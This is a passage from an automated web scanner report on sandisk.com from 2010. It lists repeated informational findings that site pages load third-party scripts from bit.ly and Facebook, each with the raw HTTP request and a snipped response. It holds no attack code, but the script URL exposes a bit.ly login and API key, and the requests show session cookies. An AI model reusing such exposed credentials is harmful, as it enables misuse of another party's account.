GET /about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24124
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.60. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14419
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.61. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24491
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.62. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18412
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world........s-smallest-64gb-solid-state-drive

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world........s-smallest-64gb-solid-state-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world..................s-smallest-64gb-solid-state-drive

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world..................s-smallest-64gb-solid-state-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:41:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world......................................s-smallest-64gb-solid-state-drive

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world......................................s-smallest-64gb-solid-state-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.66. http://www.sandisk.com/about-sandisk/privacy-policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/privacy-policy

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/privacy-policy HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

2.67. http://www.sandisk.com/about-sandisk/privacy-policy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/privacy-policy/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/privacy-policy/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

2.68. http://www.sandisk.com/about-sandisk/privacy-policy/archived-privacypolicy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/privacy-policy/archived-privacypolicy

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/privacy-policy/archived-privacypolicy HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/privacy-policy
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

2.69. http://www.sandisk.com/about-sandisk/privacy-policy/faq previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/privacy-policy/faq

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/privacy-policy/faq HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/privacy-policy
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

2.70. http://www.sandisk.com/about-sandisk/procurement--global-supply-base-management previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/procurement--global-supply-base-management

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/procurement--global-supply-base-management HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16434
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.71. http://www.sandisk.com/about-sandisk/terms-of-use previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/terms-of-use

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/terms-of-use HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24872
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.72. http://www.sandisk.com/about-sandisk/worldwide-locations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/worldwide-locations

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/worldwide-locations HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18850
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.73. http://www.sandisk.com/about-sandisk/worldwide-locations/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/worldwide-locations/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/worldwide-locations/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18851
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.74. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk--israel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/worldwide-locations/sandisk--israel

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/worldwide-locations/sandisk--israel HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/worldwide-locations
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17497
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.75. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk-asia-pacific previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/worldwide-locations/sandisk-asia-pacific

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/worldwide-locations/sandisk-asia-pacific HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/worldwide-locations
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19002
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.76. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk-europe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/worldwide-locations/sandisk-europe

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/worldwide-locations/sandisk-europe HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/worldwide-locations
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17540
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.77. http://www.sandisk.com/business-solutions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35895
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.78. http://www.sandisk.com/business-solutions/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/contact-us

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/contact-us HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15607
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

